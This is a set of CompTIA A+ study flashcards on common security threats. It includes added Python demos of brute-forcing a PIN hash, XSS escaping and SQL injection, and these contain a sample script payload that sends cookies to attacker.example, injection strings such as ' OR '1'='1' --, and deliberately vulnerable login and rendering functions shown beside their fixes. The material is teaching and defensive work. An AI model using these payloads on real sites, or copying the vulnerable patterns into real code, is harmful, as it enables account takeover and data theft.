Threats Flashcards
Zero-Day Attack
A zero-day attack
is an attack on a vulnerability that the software's developers don't yet know about, or at least haven't yet fixed. It gets the name because the developer of the flawed software has had zero days to fix the vulnerability. Microsoft, Apple, and other software developers regularly post patches to fix flaws as they're discovered; until that patch exists and is installed, a zero-day has no fix to apply.
Spoofing
Spoofing
is the process of pretending to be someone or something you are not by placing false information into your packets. Any data sent on a network can be spoofed. Here are a few quick examples of commonly spoofed data:
- Source MAC address and IP address, to make you think a packet came from somewhere else
- E-mail address, to make you think an e-mail came from somewhere else
- Web address, to make you think you are on a Web page you are not on
- Username, to make you think a certain user is contacting you when in reality it’s someone completely different
Generally, spoofing isn’t so much a threat as it is a tool to make threats. If you spoof my e-mail address, for example, that by itself isn’t a threat. If you use my e-mail address to pretend to be me, however, and to ask my employees to send in their usernames and passwords for network login? That’s clearly a threat. (And also a waste of time; my employees would never trust me with their usernames and passwords.)
On-path attack (Man-In-The-Middle)
In an on-path attack
(previously referred to as the man-in-the-middle attack
), an attacker taps into communications between two systems, covertly intercepting traffic thought to be only between those systems, reading or in some cases even changing the data and then sending the data on. A classic on-path attack would be a person using special software on a wireless network to make all the clients think his laptop is a wireless access point. He could then listen in on that wireless network, gathering up all the conversations and gaining access to passwords, shared keys, or other sensitive information.
Session Hijacking
Somewhat similarly to on-path attacks, session hijacking
tries to take over an existing, already-authenticated session. The attacker grabs the session identifier (typically a session cookie or token) that a server uses to recognize a logged-in user and then presents it as his own, so he is treated as that user without ever knowing the password. Unlike an on-path attack, session hijacking isn't about listening in on the whole conversation; it only needs that one piece of session data, and once it has it the attacker can act as the user for as long as the session stays valid.
Brute-Force Attack
CompTIA describes brute force
as a threat, but it's more of a method that threat agents use. Brute force is a method where a threat agent guesses many or all possible values for some data. Most of the time the term brute force refers to an attempt to crack a password, but the concept also applies to other attacks. You can brute force a search for open ports, network IDs, usernames, and so on. Pretty much any attempt to guess the contents of some kind of data field that isn't obvious (or is hidden) is considered a brute-force attack. The defender's lever is the size of the search space: every extra character, and every extra symbol allowed in each position, multiplies the number of guesses needed.
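As an added illustration (example code written for this page, not taken from the CompTIA text), the script below brute forces the SHA-256 hash of a constructed 4-digit PIN by trying every candidate in order, and then shows how quickly the same search grows when the field is an 8-character mixed-case alphanumeric password. The PIN value and the alphabets are assumptions chosen for the example.

```python
import hashlib
import itertools
import string


def sha256_hex(text):
    # Hash a candidate the same way the stolen value was hashed (unsalted SHA-256 here, for the example).
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def brute_force(target_hash, alphabet, max_len):
    """Try every string over `alphabet` from length 1 up to `max_len`, shortest first.

    Returns (recovered_value, attempts); recovered_value is None if nothing matched.
    """
    attempts = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            attempts += 1
            guess = "".join(combo)
            if sha256_hex(guess) == target_hash:
                return guess, attempts
    return None, attempts


def keyspace(alphabet_size, length):
    # Number of candidates an exhaustive search must cover for a fixed length.
    return alphabet_size ** length


def worst_case_seconds(alphabet_size, length, guesses_per_second):
    # Time to exhaust the whole keyspace at a given guessing rate.
    return keyspace(alphabet_size, length) / guesses_per_second


def demo():
    # Constructed target: the hash of a 4-digit PIN, as an attacker might pull from a leaked database.
    target = sha256_hex("4071")
    pin, attempts = brute_force(target, string.digits, 4)
    return {
        "pin": pin,
        "attempts": attempts,
        "pin_keyspace": keyspace(10, 4),
        # The same exhaustive search against 8 characters drawn from a-z, A-Z, 0-9.
        "password_keyspace": keyspace(62, 8),
        # Assumed rate of 1,000 guesses per second, e.g. an online login form with no lockout.
        "pin_worst_case_seconds": worst_case_seconds(10, 4, 1000),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Two points worth noticing when you run it: the search finds the PIN in a few thousand attempts because the space is only 10,000 values, while the 8-character password space is over 2 x 10^14. Against a live login form the defender also controls the guessing rate (account lockout, rate limiting), which is why online brute force is far slower than cracking a stolen hash offline.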
Denial of Service
A denial of service (DoS)
attack uses various methods to overwhelm a system, such as a Web server, to make it essentially nonfunctional. DoS attacks were relatively common in the early days of the Web. These days you’ll see distributed denial of service (DDoS) attacks that use many machines simultaneously to assault a system. A DDoS attack is generally executed using a botnet. A botnet consists of any number (usually a large one) of systems infected with malware designed to allow them to be controlled by an attacker and used to send disruptive traffic designed to bring down a resource. You’ll get a closer look at botnets and how they work later on in the chapter when we discuss malware.
Cross-Site Scripting
Most companies have Web sites, and Web sites can sometimes be very vulnerable to attacks by the bad guys. One such attack that can pose a threat to your Web applications is known as cross-site scripting. Cross-site scripting (XSS)
is an attack in which the attacker injects malicious script into a Web app's pages so that other users' browsers run it as if it came from the site itself. Generally, this occurs because the application copies user-supplied input (a comment, a search term, a profile field) into the HTML it sends out without escaping it, and the attacker finds and exploits that gap. XSS can lead to stolen session cookies and account takeovers, stolen data, or actions performed in the victim's name, including an administrator's. The nitty-gritty details of XSS, specific variants of the attack, and how to prevent them are things you'll learn more about in CompTIA Security+, but for the CompTIA A+ 1102 exam, be aware that cross-site scripting can pose a major threat to an organization's Web site(s).
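To make the "copies input into the page without escaping it" point concrete, here is an added example (written for this page, not code from the CompTIA text or any real Web app). It renders a constructed attacker comment two ways, with and without HTML escaping, and then parses the result the way a browser would to see whether a new `<script>` tag or event-handler attribute appeared. The hostname attacker.example is a reserved example name; the payloads and the rendering functions are assumptions chosen for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: a "comment" submitted to a guestbook-style page.
STORED_XSS_PAYLOAD = (
    "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"
)
# Constructed sample input aimed at a value="..." attribute rather than the page body.
ATTRIBUTE_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'


def render_comment_vulnerable(comment):
    # Copies the user's text straight into the page, so any tags in it become real markup.
    return '<div class="comment">' + comment + '</div>'


def render_comment_safe(comment):
    # html.escape turns < > & " ' into entities; the browser displays the text instead of running it.
    return '<div class="comment">' + html.escape(comment) + '</div>'


def render_search_box_partial(value):
    # A common half-fix: escaping only angle brackets. Inside an attribute, a quote is enough to break out.
    partly = value.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
    return '<input name="q" value="' + partly + '">'


def render_search_box_safe(value):
    # quote=True (the default) also escapes " and ', so the value cannot close the attribute early.
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


class TagCollector(HTMLParser):
    """Records every start tag and attribute name the browser would see in a rendered fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attr_names = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attr_names.extend(name for name, _ in attrs)


def parsed_tags_and_attrs(fragment):
    parser = TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags, parser.attr_names


def demo():
    results = {}
    tags, _ = parsed_tags_and_attrs(render_comment_vulnerable(STORED_XSS_PAYLOAD))
    results["vulnerable_body_runs_script"] = "script" in tags
    tags, _ = parsed_tags_and_attrs(render_comment_safe(STORED_XSS_PAYLOAD))
    results["safe_body_runs_script"] = "script" in tags
    _, attrs = parsed_tags_and_attrs(render_search_box_partial(ATTRIBUTE_PAYLOAD))
    results["partial_attr_injects_handler"] = "onfocus" in attrs
    _, attrs = parsed_tags_and_attrs(render_search_box_safe(ATTRIBUTE_PAYLOAD))
    results["safe_attr_injects_handler"] = "onfocus" in attrs
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The second pair of functions is the caveat a practitioner cares about: escaping depends on where the input lands. Stripping angle brackets protects the page body but not an attribute value, where a single double quote lets the attacker add an `onfocus` handler that fires without any `<script>` tag at all.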
SQL Injection
You’ve most likely deduced by now that accessing, stealing, and destroying data are common goals of malicious actors, so let’s take a look at one of the favorite methods hackers use to achieve them. Before I can tell you about the dreaded SQL injection, I’m going to have to tell you what SQL is. SQL is an acronym for Structured Query Language. SQL is a language that enables a program to interact with a database using various commands and queries. If you’ve started thinking that attacking a database sounds like a dangerous threat, you’re right. An SQL injection
occurs when an attacker enters SQL commands into an input field like you'd see in a Web app, in order to gain access to data in a database that they shouldn't be able to see. It works because the application pastes the user's input directly into the text of the SQL statement it sends to the database, so a quote mark or comment symbol typed into a login form changes the meaning of the query. You won't need to know the ins and outs of how SQL injection is performed, but know that preventing it is done at the programming level: the app passes user input to the database as separate query parameters (parameterized or prepared statements) instead of building the SQL string by hand, and backs that up with input validation that rejects characters a field should never contain.
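The following added example (written for this page, not code from the CompTIA text) puts a vulnerable login query next to its parameterized replacement, using Python's built-in sqlite3 module and a constructed three-row users table. It runs a legitimate login and two classic injections against both versions, and adds a simple username allowlist as the input-validation layer. The table contents, the payloads, and the allowlist pattern are assumptions chosen for the demonstration.

```python
import re
import sqlite3

# Constructed sample data: a tiny users table standing in for a Web app's back-end database.
# Passwords are stored in the clear only to keep the example short; real apps store hashes.
SAMPLE_USERS = [
    ("alice", "correct horse battery"),
    ("bob", "hunter2"),
    ("carol", "letmein"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    # Builds the statement by pasting the form fields into the SQL text.
    # Whatever the user typed is parsed by the database as part of the query.
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    # Parameterized query: the SQL text is fixed and the driver hands the values to the
    # database separately, so a quote or comment marker in the input is treated as data.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def is_valid_username(username):
    # Input validation as a second layer: reject anything outside the characters a username needs.
    return USERNAME_RE.match(username) is not None


def demo():
    conn = make_db()
    results = {}
    # Normal use: both versions return the one matching account.
    results["legit_vulnerable"] = login_vulnerable(conn, "alice", "correct horse battery")
    results["legit_safe"] = login_safe(conn, "alice", "correct horse battery")
    # Attack 1: the quote closes the username literal and '--' comments out the password check.
    results["bypass_vulnerable"] = login_vulnerable(conn, "alice' -- ", "wrong")
    results["bypass_safe"] = login_safe(conn, "alice' -- ", "wrong")
    # Attack 2: an always-true OR clause makes the WHERE match every row.
    results["dump_vulnerable"] = login_vulnerable(conn, "' OR '1'='1' -- ", "x")
    results["dump_safe"] = login_safe(conn, "' OR '1'='1' -- ", "x")
    results["validation_rejects"] = not is_valid_username("alice' -- ")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Against the concatenated query, `alice' -- ` logs in as alice with no password and `' OR '1'='1' -- ` returns every account; the parameterized query returns nothing for both, because the database never sees those characters as SQL. The allowlist check is defense in depth, not a replacement: the parameterized query is what actually closes the hole.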
Unauthorized Access
Unauthorized access
occurs when a person accesses resources without permission. “Resources” in this case means data, applications, and hardware. A user can alter or delete data; access sensitive information, such as financial data, personnel files, or e-mail messages; or use a computer for purposes the owner did not intend.
Not all unauthorized access is malicious—often this problem arises when users who are poking around in a computer out of curiosity or boredom discover they can access resources in a fashion the primary user did not have in mind. Unauthorized access becomes malicious when people knowingly and intentionally take advantage of weaknesses in your security to gain information, use resources, or destroy data!
One way to gain unauthorized access is intrusion. You might imagine someone kicking in a door and hacking into a computer, but more often than not it’s someone sitting at a home computer, trying various passwords over the Internet. Not quite as glamorous, but it’ll do. Another insidious method is manipulating people into giving privileged information or access that would be otherwise unavailable to a would-be attacker. This takes us into a discussion of one of the most common and dangerous categories of threats.
Social Engineering
Although you’re more likely to lose data through accidents, the acts of malicious users get the headlines. Most of these attacks come under the heading of social engineering
—the process of using or manipulating people inside the organization to gain access to its network or facilities—which covers the many ways humans can use other humans to gain unauthorized information. This information may be a network login, a credit card number, company customer data—almost anything you might imagine that one person or organization may not want outsiders to access.
Common social engineering techniques include:
- Infiltration: Infiltration involves attackers physically entering a facility, often through impersonation, to gain access to sensitive information or systems.
- Information Gathering: Information gathering refers to threat actors collecting information to facilitate future attacks, often using techniques like dumpster diving or shoulder surfing.
- Vishing: Vishing is a social engineering attack where attackers use phone calls to trick individuals into revealing sensitive information, like usernames or passwords.
- Phishing: Phishing is a method where attackers send fraudulent communications, usually emails, to deceive victims into providing sensitive information such as usernames, passwords, or financial details.
- Spear phishing: Spear phishing targets specific individuals with tailored messages, using personalized information to increase the likelihood of success.
- Whaling: Whaling is a type of phishing attack that specifically targets high-ranking individuals within an organization, such as executives, for valuable information.
- Evil Twin: An evil twin is a fake wireless access point set up to mimic a legitimate one, used by attackers to intercept network traffic and steal sensitive data from connected users.